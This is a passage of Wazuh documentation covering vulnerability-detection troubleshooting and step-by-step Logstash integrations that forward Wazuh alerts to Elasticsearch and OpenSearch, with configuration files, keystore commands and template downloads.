  5. Ensure the Wazuh indexer service is active. Run the following command on the Wazuh indexer node to check the status:

    # systemctl status wazuh-indexer
    

    If the service is down, investigate potential errors.

  6. Replace <WAZUH_INDEXER_CLUSTER_NAME> and run the following command on the Wazuh indexer node to check the indexer logs for errors:

    # cat /var/log/wazuh-indexer/<WAZUH_INDEXER_CLUSTER_NAME>.log | grep -E "ERROR|WARN|Caused"
    
The 'vulnerability-detector' configuration is deprecated

This warning occurs because upgrading the Wazuh manager does not modify the /var/ossec/etc/ossec.conf file, preserving the previous Wazuh Vulnerability Detection module configuration. Additionally, warnings about invalid configurations for interval, min_full_scan_interval, run_on_start and provider elements may appear. To resolve these issues, update the configuration as outlined in Configuration.

No username and password found in the keystore

To ensure alerts and vulnerabilities are indexed and displayed on the Wazuh dashboard, add indexer credentials to the manager keystore.

Run the following commands to store the credentials securely:

# echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
# echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password

If you've forgotten your Wazuh indexer password, refer to the password management guide to reset it.

IndexerConnector initialization failed

This warning may indicate incorrect keystore credentials, a configuration issue, or a certificate error. Verify that the IP address, port, and certificate paths are correctly configured in the <indexer> section of /var/ossec/etc/ossec.conf.

After resolving the issue and successfully connecting the Wazuh manager to the indexer, you should see a log like this:

INFO: IndexerConnector initialized successfully for index: ...

If the error persists, enable wazuh_modules.debug=2 temporarily in /var/ossec/etc/local_internal_options.conf for more details.

Vulnerability detection seems to be disabled or has a problem

This warning suggests that the Wazuh Vulnerability Detection module might be disabled or misconfigured. To troubleshoot, follow these steps:

  1. Ensure the vulnerability-detection module is enabled in /var/ossec/etc/ossec.conf.

  2. Locate the <indexer> block in /var/ossec/etc/ossec.conf and confirm there are no misconfigurations or duplicate <indexer> sections.

  3. Verify the wazuh-states-vulnerabilities-* index is correctly created. Ensure it is present and its health status is green by navigating to Indexer Management > Index Management > Indexes on the Wazuh dashboard.

  4. If the index wasn’t created, check the Wazuh manager logs for errors or warnings using the following command:

    # cat /var/ossec/logs/ossec.log | grep -i -E "error|warn"
    
Application Not Found

If you see the message Application Not Found when accessing the Wazuh dashboard after upgrading, it may be because the configuration file /etc/wazuh-dashboard/opensearch_dashboards.yml wasn’t updated with the latest changes.

To fix this issue, update the uiSettings.overrides.defaultRoute setting in the /etc/wazuh-dashboard/opensearch_dashboards.yml file to the following value:

uiSettings.overrides.defaultRoute: /app/wz-home
SSO issue when upgrading from Wazuh 4.8 and earlier

If upgrading from Wazuh 4.8 or earlier, update the exchange_key value in /etc/wazuh-indexer/opensearch-security/config.yml.

Previously, exchange_key was set by copying the X.509 Certificate blob, excluding the -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- lines.

Starting with Wazuh 4.9.0, exchange_key must be a 64-character random alphanumeric string.
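
A 64-character random alphanumeric value can be generated with any tool you trust. As a hypothetical example, the snippet below uses Python's secrets module:

import secrets
import string

# Generate a 64-character random alphanumeric string suitable for exchange_key.
alphabet = string.ascii_letters + string.digits
print("".join(secrets.choice(alphabet) for _ in range(64)))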

For guidance, refer to the first step of the Wazuh indexer configuration in the Single sign-on (SSO) guides for platforms like Okta, Microsoft Entra ID, PingOne, Google, Jumpcloud, OneLogin, and Keycloak.

None of the above solutions are fixing my problem

We have a welcoming community ready to assist with most Wazuh deployment and usage issues. Visit any of the Wazuh community channels for support.

You can also report issues directly on our GitHub repositories under the Wazuh organization.

When reporting a problem, include detailed information such as the version, operating system, and relevant logs to help us assist you effectively.

Integrations guide: Elastic, OpenSearch, Splunk, Amazon Security Lake

Wazuh offers extensive compatibility and robust integration features that allow users to connect it with other security solutions and platforms. Integrating Wazuh with other security solutions enables users to manage Wazuh data in diverse ways.

Elastic, OpenSearch, and Splunk are software platforms designed for search, analytics, and data management. They are used to collect, index, search, and analyze large volumes of data in real-time and historical contexts.

Amazon Security Lake is a service designed to help organizations collect, manage, and analyze security data from various sources. Its primary purpose is to centralize security data, making it easier to detect, investigate, and respond to security threats.

Up to Wazuh v4.5, Wazuh provided integrated applications that allowed users to manage Wazuh and its security data from third-party platforms. However, from version 4.6, we no longer develop these integrated applications; we only support them with critical security updates.

In this document, we describe new methods of integrating your Wazuh deployment with the following third-party security platforms: Elastic, OpenSearch, Splunk, and Amazon Security Lake.

Integration methods

We describe how to configure the following integration alternatives for each of the security platforms mentioned above:

  • Wazuh indexer integration

  • Wazuh server integration

Additionally, we demonstrate how to import the provided dashboards for these platforms.

Wazuh indexer integration

The Wazuh agent collects security data from monitored endpoints. These data are analyzed by the Wazuh server and indexed in the Wazuh indexer. The Wazuh indexer integration forwards analyzed security data from the Wazuh indexer to the third-party security platform indexer in the form of indexes. Indexes are collections of documents with similar properties.

Wazuh indexer integration requires a running Wazuh indexer and uses Logstash as a data forwarder for forwarding alerts to a third-party security platform. Logstash forwards the alerts generated after querying the Wazuh indexer. This integration requires that you install Logstash on a dedicated server or on the server hosting the third-party indexer.

We recommend the Wazuh indexer integration if you want to continue analyzing security data in Wazuh and archive it in a data lake for storage or out-of-band analysis. The Wazuh indexer and the third-party platform indexer both create indexes for the same alerts, so this integration duplicates indexes and can lead to high resource costs.
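
Conceptually, the forwarder in this integration runs a recurring query against the wazuh-alerts-* indexes and pushes the results to the destination indexer. The hypothetical sketch below shows only the query half of that loop with Python's requests library; the Logstash pipeline configured later in this guide implements the same idea declaratively, and the address, credentials, and certificate path are placeholders.

import requests

# Query alerts indexed in the last minute (placeholders follow this guide's conventions).
WAZUH_INDEXER = "https://<WAZUH_INDEXER_ADDRESS>:9200"
QUERY = {"query": {"range": {"@timestamp": {"gt": "now-1m"}}}}

response = requests.get(
    f"{WAZUH_INDEXER}/wazuh-alerts-4.x-*/_search",
    json=QUERY,
    auth=("<WAZUH_INDEXER_USERNAME>", "<WAZUH_INDEXER_PASSWORD>"),
    verify="</PATH/TO/LOCAL/WAZUH_INDEXER>/root-ca.pem",
    timeout=10,
)
for hit in response.json()["hits"]["hits"]:
    print(hit["_source"].get("rule", {}).get("description"))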

Wazuh server integration

The Wazuh agent collects security data from monitored endpoints. The Wazuh server analyzes the data and generates alerts on the Wazuh dashboard. Wazuh stores security alerts locally in the /var/ossec/logs/alerts/alerts.log and /var/ossec/logs/alerts/alerts.json alerts files. The Wazuh server integration operates by reading the /var/ossec/logs/alerts/alerts.json file and forwarding the alerts to the third-party platform using a data forwarder.

We recommend Wazuh server integration over indexer integration if you don’t have enough resources for hosting both the third-party security platform indexer and the Wazuh indexer. This is particularly relevant for users operating Wazuh at a large scale, generating numerous alerts.

To implement the Wazuh server integration, a data forwarder must be installed on the same system as the Wazuh server. In multi-node configurations, the data forwarder should be installed on each Wazuh server node.
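
As a rough illustration of what a forwarder does in this mode, the hypothetical sketch below follows /var/ossec/logs/alerts/alerts.json and hands each new alert to a placeholder function; in a real deployment, the third-party platform's own forwarder performs this job.

import json
import time

ALERTS_FILE = "/var/ossec/logs/alerts/alerts.json"

def forward(alert: dict) -> None:
    # Placeholder: a real forwarder ships the alert to the third-party platform.
    print(alert.get("rule", {}).get("description"))

with open(ALERTS_FILE) as alerts:
    alerts.seek(0, 2)            # Start at the end of the file, like tail -f.
    while True:
        line = alerts.readline()
        if not line:
            time.sleep(1)        # Wait for new alerts to be written.
            continue
        forward(json.loads(line))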

Note

To make sure Wazuh logs the alerts to /var/ossec/logs/alerts/alerts.json, check that the jsonout_output option in the Wazuh server configuration /var/ossec/etc/ossec.conf file is set to yes.

Integration considerations

Data forwarders

Third-party security platforms typically have a dedicated data collector or data forwarder which is required for implementing these integrations. These forwarders facilitate the data flow from the Wazuh indexer or server to the third-party security platforms.

In the Wazuh indexer integration alternative, the forwarder executes periodic queries to the Wazuh indexer. These queries are performed in blocks, with the time range of each query matching the specified query period. Consequently, there may be a delay in the arrival of alerts at the destination, depending on the frequency set for querying new alerts.

In the Wazuh server integration, the forwarder periodically checks the Wazuh alerts file. If it detects changes since the last read, it loads all the new alerts and sends them to the third-party platform.

Similarly, checking for new alerts periodically means that the alerts reach the destination with a delay. This delay depends on the frequency established to check for new alerts.

We discuss the data forwarders that we use in the integration alternatives.

There are several ways to ingest data into third-party indexers, which include using content sources, Elastic Agent, Beats, or Logstash. Each method has different trade-offs and use cases. In this documentation, we consider only Logstash and the Splunk forwarder, and we explain the reasons for this choice.

Logstash

Elastic Logstash is a free and open server-side data processing pipeline that ingests data from multiple sources, transforms it, and then sends it to your desired destination. The Logstash core is licensed under Apache 2.0, with non-open source extensions distributed under the x-pack label. Logstash supports scheduling queries at intervals as short as one second.

Logstash reads data from indexes using input plugins and writes to destinations using output plugins, applying any transformations through filter plugins. In summary, Logstash is the most compatible data forwarder for the Wazuh indexer and server integrations.

Splunk Forwarder

Splunk forwarder is a powerful data collection and forwarding tool provided by Splunk. It serves as an agent that collects data from various sources, transforms it if necessary, and sends it to the Splunk indexing infrastructure for further analysis and visualization.

The Splunk forwarder supports data collection from diverse sources such as log files, metrics, network devices, and APIs. It provides robust mechanisms to parse, filter, and enrich the collected data before sending it to the Splunk indexers. This enables users to extract relevant information, apply custom formatting, and enhance the data's overall quality and usefulness.

Redistributable dashboards

In this guide, you can find configuration steps to set up your integration and use the dashboards we provide for third-party security platforms. These dashboards help you get insights from your security data using these platforms.

Capacity planning

When integrating Wazuh with other security solutions, you need to carefully plan your storage resources and scaling needs beforehand. While the details of capacity planning are beyond the scope of this guide, here are a few considerations.

When using the Wazuh indexer integration, you need to take the following points into consideration:

  • The disk space available on the third-party endpoint.

  • The network bandwidth the third-party indexer needs to ingest the collected data.

  • The network bandwidth the data forwarder uses to forward the security data.

  • The scalability of the data forwarder infrastructure to read all the data from the Wazuh indexer and forward it to the third-party security platform.

When using the Wazuh server integration, you need to take the following points into consideration:

  • The disk space each Wazuh server must have to forward the data.

  • The network bandwidth the Wazuh server and the third-party security platform need to receive and forward the security data respectively.

  • The additional CPU/RAM resources the data forwarder requires to work.

  • The disk space on the destination platform to accommodate the forwarded data it receives.

After the integration, you might have the same data in both Wazuh and third-party security platforms. To minimize the amount of duplicated data, you can archive the data from the Wazuh server or indexer for storage or later analysis. Also, you need to plan backups and recovery of data in case of failure.

Elastic Stack integration

Elasticsearch is the central component of the Elastic Stack (commonly referred to as the ELK Stack: Elasticsearch, Logstash, and Kibana), a set of free and open tools for data ingestion, enrichment, storage, analysis, and visualization.

In this guide, you can find out how to integrate Wazuh with Elastic in the following ways:

Wazuh indexer integration using Logstash

Perform all the steps described below on your Logstash server. You must install Logstash on a dedicated server or on the server hosting the third-party indexer. We performed the steps on a Linux operating system. Logstash forwards the data from the Wazuh indexer to Elasticsearch in the form of indexes.

Learn more about the Wazuh indexer integration and its necessary considerations.

Installing Logstash

Perform the following steps to install Logstash and the required plugin.

  1. Follow the Elastic documentation to install Logstash. Ensure that you consider the requirements and performance tuning guidelines for running Logstash.

    Note

    Ensure all components of your ELK (Elasticsearch, Logstash, and Kibana) stack are the same version to avoid compatibility issues.

  2. Run the following command to install the logstash-input-opensearch plugin. This plugin reads data from the Wazuh indexer into the Logstash pipeline.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
    
  3. Copy the Wazuh indexer and Elasticsearch root certificates to the Logstash server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/wazuh-indexer-certs and /etc/logstash/elasticsearch-certs respectively.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem
    $ sudo chmod -R 755 </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem and </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem with your Wazuh indexer and Elasticsearch certificate local paths on the Logstash endpoint respectively.

Configuring new indexes

You must define mappings between the data and the index fields so that Elasticsearch indexes your data correctly. Elasticsearch can infer these mappings, but we recommend that you configure them explicitly. Wazuh provides a set of mappings for this purpose.

You need to use the logstash/es_template.json template to configure this index initialization for your Elasticsearch platform. The refresh_interval is set to 5s in the template we provide.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

$ sudo mkdir /etc/logstash/templates
$ sudo curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-template.json

In Elasticsearch, indexes support up to 1000 fields by default. However, Wazuh logs might contain more than this number of fields. To solve this issue, the provided wazuh.json template sets the field limit to 10000 by default, as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh indexes and send them to Elasticsearch.

The Logstash pipeline requires access to the following secret values:

  • Wazuh indexer credentials

  • Elasticsearch credentials

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of the Wazuh indexer and Elasticsearch in the Logstash keystore.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    ELASTICSEARCH_USERNAME, ELASTICSEARCH_PASSWORD, WAZUH_INDEXER_USERNAME, and WAZUH_INDEXER_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your Elasticsearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_PASSWORD
      
    3. Store your Wazuh indexer administrator username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_PASSWORD
      

    Where:

    • ELASTICSEARCH_USERNAME and ELASTICSEARCH_PASSWORD are keys representing your Elasticsearch username and password respectively.

    • WAZUH_INDEXER_USERNAME and WAZUH_INDEXER_PASSWORD are keys representing your Wazuh indexer administrator username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-elasticsearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-elasticsearch.conf
      
    2. Add the following configuration to the wazuh-elasticsearch.conf file. This sets the parameters required to run Logstash.

      input {
        opensearch {
         hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
         user  =>  "${WAZUH_INDEXER_USERNAME}"
         password  =>  "${WAZUH_INDEXER_PASSWORD}"
         index =>  "wazuh-alerts-4.x-*"
         ssl => true
         ca_file => "</PATH/TO/LOCAL/WAZUH_INDEXER>/root-ca.pem"
         query =>  '{
             "query": {
                "range": {
                   "@timestamp": {
                      "gt": "now-1m"
                   }
                }
             }
         }'
         schedule => "* * * * *"
        }
      }
      
      output {
          elasticsearch {
               hosts => "<ELASTICSEARCH_ADDRESS>"
               index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
               user => '${ELASTICSEARCH_USERNAME}'
               password => '${ELASTICSEARCH_PASSWORD}'
               ssl => true
               cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem"
               template => "/etc/logstash/templates/wazuh.json"
               template_name => "wazuh"
               template_overwrite => true
          }
      }
      

      Where:

      • <WAZUH_INDEXER_ADDRESS> is your Wazuh indexer address or addresses in case of cluster deployment.

      • <ELASTICSEARCH_ADDRESS> is your Elasticsearch IP address.

      • </PATH/TO/LOCAL/WAZUH_INDEXER>/root-ca.pem is your Wazuh indexer certificate local path on the Logstash server. For example, you can use /etc/logstash/wazuh-indexer-certs/root-ca.pem which is the Wazuh indexer root certificate that was copied earlier.

      • </PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem is your Elasticsearch certificate local path on the Logstash server. For example, you can use /etc/logstash/elasticsearch-certs/root-ca.pem which is the Elasticsearch certificate that was copied earlier.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem" with ssl_certificate_verification => false.

      If you are using composable index templates and the _index_template API, set the optional parameter legacy_template => false.
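Before starting the pipeline, you can optionally confirm that the Logstash keystore contains the keys referenced in the configuration above. The list subcommand prints key names only, never the secret values:

$ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash list

The output should include ELASTICSEARCH_USERNAME, ELASTICSEARCH_PASSWORD, WAZUH_INDEXER_USERNAME, and WAZUH_INDEXER_PASSWORD.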

Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-elasticsearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the configuration files.

    Ensure that Wazuh indexer RESTful API port (9200) is open on your Wazuh indexer. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash.service
    $ sudo systemctl start logstash.service
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete will not be forwarded to the Elastic indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events generated when Logstash runs. View this file in case you need to troubleshoot.

After Logstash is successfully running, check how to configure the Wazuh alert index pattern and verify the integration.
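If no data appears on the Elasticsearch side, a useful first check is to confirm that the Wazuh indexer is reachable from the Logstash host and already holds alerts. A minimal query, using the example certificate path from this guide (replace the address and credentials with your own):

$ curl -s --cacert /etc/logstash/wazuh-indexer-certs/root-ca.pem \
    -u <WAZUH_INDEXER_USERNAME>:<WAZUH_INDEXER_PASSWORD> \
    "https://<WAZUH_INDEXER_ADDRESS>:9200/_cat/indices/wazuh-alerts-4.x-*?v"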

Wazuh server integration using Logstash

Perform all the steps below on your Wazuh server. Learn more about the Wazuh server integration and its necessary considerations.

Installing Logstash

We use Logstash to forward security data in the /var/ossec/logs/alerts/alerts.json alerts file from the Wazuh server to the Elasticsearch indexes.

Perform the following steps to install Logstash and the required plugin.

  1. Follow the Elastic documentation to install Logstash. Ensure that you consider the requirements and performance tuning guidelines for running Logstash.

    Note

    Ensure all components of your ELK (Elasticsearch, Logstash, and Kibana) stack are the same version to avoid compatibility issues.

  2. Run the following command to install the logstash-output-elasticsearch plugin. This plugin allows Logstash to write data into Elasticsearch.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-output-elasticsearch
    
  3. Copy the Elasticsearch root certificate to the Wazuh server. You can add the certificate to any directory of your choice. In our case, we add it in /etc/logstash/elasticsearch-certs directory.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem with your Elasticsearch certificate local path on the Wazuh server.

Configuring new indexes

You must define the mappings between the data and the index types to ensure Elasticsearch indexes your data correctly. Elasticsearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure Elasticsearch indexes the data correctly.

You need to use the logstash/es_template.json template to configure this index initialization for your Elasticsearch platform. The refresh_interval is set to 5s in the template we provide.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

$ sudo mkdir /etc/logstash/templates
$ sudo curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-template.json

In Elasticsearch, indexes support up to 1000 fields by default. However, Wazuh logs can contain more fields than this. To solve this issue, the provided wazuh.json template raises the total fields limit to 10000, as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data in the Wazuh /var/ossec/logs/alerts/alerts.json alert file and send them to Elasticsearch.

The Logstash pipeline requires access to your Elasticsearch credentials.

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of Elasticsearch.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    ELASTICSEARCH_USERNAME and ELASTICSEARCH_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your Elasticsearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_PASSWORD
      

      Where ELASTICSEARCH_USERNAME and ELASTICSEARCH_PASSWORD are keys representing your Elasticsearch username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-elasticsearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-elasticsearch.conf
      
    2. Add the following configuration to the wazuh-elasticsearch.conf file. This sets the parameters required to run Logstash.

      input {
        file {
          id => "wazuh_alerts"
          codec => "json"
          start_position => "beginning"
          stat_interval => "1 second"
          path => "/var/ossec/logs/alerts/alerts.json"
          mode => "tail"
          ecs_compatibility => "disabled"
        }
      }
      
      output {
          elasticsearch {
               hosts => "<ELASTICSEARCH_ADDRESS>"
               index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
               user => '${ELASTICSEARCH_USERNAME}'
               password => '${ELASTICSEARCH_PASSWORD}'
               ssl => true
               cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem"
               template => "/etc/logstash/templates/wazuh.json"
               template_name => "wazuh"
               template_overwrite => true
          }
      }
      

      Where:

      • <ELASTICSEARCH_ADDRESS> is your Elasticsearch IP address.

      • </PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem is your Elasticsearch root certificate local path on the Wazuh server. For example, you can use /etc/logstash/elasticsearch-certs/root-ca.pem which is the Elasticsearch root certificate that was copied earlier.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem" with ssl_certificate_verification => false.

  4. By default the /var/ossec/logs/alerts/alerts.json file is owned by the wazuh user with restrictive permissions. You must add the logstash user to the wazuh group so it can read the file when running Logstash as a service:

    $ sudo usermod -a -G wazuh logstash
    
Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-elasticsearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the configuration files.

    Ensure that Wazuh server RESTful API port (55000) is open on your Wazuh server. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash.service
    $ sudo systemctl start logstash.service
    

Note

Any data indexed before the configuration is complete will not be forwarded to the Elastic indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events generated when Logstash runs. View this file in case you need to troubleshoot.
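For a quick scan, filtering that log for warnings and errors usually surfaces the relevant lines:

$ sudo grep -iE "error|warn" /var/log/logstash/logstash-plain.log | tail -n 20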

Check Elastic documentation for more details on setting up and running Logstash.

Configuring the Wazuh alerts index pattern in Elastic

In Kibana, do the following to create the index pattern name for the Wazuh alerts.

  1. Open the menu and select Management > Stack Management.

  2. Choose Kibana > Data Views and select Create data view.

  3. Enter a name for the data view and define wazuh-alerts-* as the index pattern name.

  4. Select timestamp in the Timestamp fields dropdown menu. Then Save data view to Kibana.

  5. Open the menu and select Discover under Analytics.

Verifying the integration

To check the integration with Elasticsearch, navigate to Discover in Kibana and verify that you can find the Wazuh security data with the data view name you entered.
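If you also want to confirm from the command line that documents reached Elasticsearch, a small search against the alerts indices works. The example below uses the certificate path from this guide and assumes the default port 9200; replace the address and credentials with your own:

$ curl -s --cacert /etc/logstash/elasticsearch-certs/root-ca.pem \
    -u <ELASTICSEARCH_USERNAME>:<ELASTICSEARCH_PASSWORD> \
    "https://<ELASTICSEARCH_ADDRESS>:9200/wazuh-alerts-4.x-*/_search?size=1&pretty"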

Elastic dashboards

Wazuh provides several dashboards for Elastic Stack. After finishing with the Elasticsearch integration setup, these dashboards display your Wazuh alerts in Elastic.

Importing these dashboards defines the index pattern name wazuh-alerts-*. The index pattern name is necessary for creating index names and receiving the alerts. We recommend using wazuh-alerts-4.x-%{+YYYY.MM.dd}.

Follow the next steps to import the Wazuh dashboards for Elastic.

  1. Run the command below to download the Wazuh dashboard file for Elastic.

    • If you are accessing the Elastic dashboard (Kibana) from a Linux or macOS system:

      # wget https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-dashboards.ndjson
      
    • If you are accessing the Elastic dashboard (Kibana) from a Windows system, run the following command in PowerShell:

      Invoke-WebRequest -Uri "https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-dashboards.ndjson" -OutFile "allDashboards.ndjson"
      
  2. Navigate to Management > Stack management in Kibana.

  3. Click on Saved Objects and click Import.

  4. Click on the Import icon, browse your files, and select the dashboard file.

  5. Click the Import button to start importing.

  6. To find the imported dashboards, select Analytics > Dashboard.

OpenSearch integration

OpenSearch is a distributed, community-driven, Apache 2.0-licensed, 100% open source search and analytics suite used for a broad set of use cases like real-time application monitoring, log analytics, and website search. OpenSearch is a fork from Elasticsearch. They have many similarities in configuration and integration steps.

In this guide, you can find out how to integrate Wazuh with OpenSearch in the following ways:

Wazuh indexer integration using Logstash

Perform the steps below on your Logstash server. You must install Logstash on a dedicated server or on the server hosting the third-party indexer. We performed these steps on a Linux operating system. Logstash forwards the data from the Wazuh indexer to OpenSearch in the form of indexes.

Learn more about the Wazuh indexer integration and its necessary considerations.

Installing Logstash

Perform the following steps to install Logstash and the required plugins. Ensure your Logstash and OpenSearch versions are compatible.

  1. Follow the Elastic documentation to install Logstash.

  2. Install the logstash-input-opensearch plugin and the logstash-output-opensearch plugin using the following command. These plugins allow reading the data from the Wazuh indexer into the Logstash pipeline and writing the data into OpenSearch.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch logstash-output-opensearch
    
  3. Copy the Wazuh indexer and OpenSearch root certificates on the Logstash server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/wazuh-indexer-certs and /etc/logstash/opensearch-certs respectively.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem
    $ sudo chmod -R 755 </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem and </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem with your Wazuh indexer and OpenSearch certificate local paths on the Logstash endpoint respectively.
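Optionally, you can confirm that both plugins were installed before continuing:

$ sudo /usr/share/logstash/bin/logstash-plugin list | grep opensearch

Both logstash-input-opensearch and logstash-output-opensearch should appear in the output.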

Configuring new indexes

You must define the mappings between the data and the index types to ensure OpenSearch indexes your data correctly. OpenSearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure OpenSearch indexes the data correctly.

You need to use the logstash/os_template.json template to configure this index initialization for your OpenSearch platform.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

# mkdir /etc/logstash/templates
# curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-template.json

In OpenSearch, indexes support up to 1000 fields by default. However, Wazuh logs can contain more fields than this. To solve this issue, the provided wazuh.json template raises the total fields limit to 10000, as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
